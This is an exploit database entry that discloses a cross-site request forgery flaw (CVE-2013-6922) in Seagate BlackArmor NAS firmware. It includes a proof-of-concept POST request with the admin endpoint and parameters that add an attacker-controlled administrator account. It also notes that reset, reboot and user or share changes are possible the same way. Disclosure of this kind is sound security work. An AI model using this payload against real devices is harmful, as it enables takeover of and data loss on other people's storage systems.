Seagate BlackArmor NAS sg2000-2000.1331跨站请求伪造漏洞

2014-01-06T00:00:00
ID SSV:61289
Type seebug
Reporter Root
Modified 2014-01-06T00:00:00

Description

No description provided by source.

                                        
                                            
                                                # Exploit Title: Seagate BlackArmor NAS - Cross Site Request Forgery
 
# Google Dork: N/A
 
# Date: 04-01-2014
 
# Exploit Author: Jeroen - IT Nerdbox
 
# Vendor Homepage: http://www.seagate.com/
 
# Software Link:
http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
 
# Version: sg2000-2000.1331
 
# Tested on: N/A
 
# CVE : CVE-2013-6922
 
#
 
## Description:
 
#
 
# There are multiple CSRF attacks possible, the proof of concept shows how
it is possible to add
 
# a user with administrative privileges to the system.
#
# It is also possible to:
 
# 
 
# 1. Factory reset the device
 
# 2. Reboot the device
 
# 3. Add/Edit/Remove users
# 4. Add/Edit/Remove shares and volumes
 
#
# This vulnerability was reported to Seagate in September 2013, they stated
that this will not be fixed. 
 
#
 
## Proof of Concept:
 
# 
 
# POST: http(s)://<url |
ip>/admin/access_control_user_add.php?lang=en&gi=a001&fbt=23
# Parameters:
 
#
 
# username attacker
# adminright yes
# fullname hacker
# userpasswd attackers_password
# userpasswdcheck attackers_password